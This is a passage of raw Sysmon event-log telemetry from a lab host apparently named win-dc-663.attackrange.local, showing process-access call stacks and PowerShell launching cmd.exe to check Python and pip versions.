21:10:05.045{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025189Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.045{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-4106-00000000CF01}1684C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025188Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.045{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4106-00000000CF01}1684C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.
dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025187Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.048{4DB9351A-A32D-60D3-4106-00000000CF01}1684C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "py -3 -m pip --version >nul 2>&1 && exit /b %%errorlevel%%" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000025186Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.014{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-4006-00000000CF01}1920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025185Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.014{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4006-00000000CF01}1920C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025184Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.014{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025183Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.014{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025182Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.014{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025181Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.014{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025180Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.014{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-4006-00000000CF01}1920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025179Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.014{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4006-00000000CF01}1920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078
deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025178Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.023{4DB9351A-A32D-60D3-4006-00000000CF01}1920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "py -3 --version >nul 2>&1 && exit /b %%errorlevel%%" 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000025177Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-3F06-00000000CF01}7016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025176Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-3F06-00000000CF01}7016C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025175Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.998{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025174Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025173Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.998{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025172Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025171Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.998{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-3F06-00000000CF01}7016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025170Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-3F06-00000000CF01}7016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.
dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_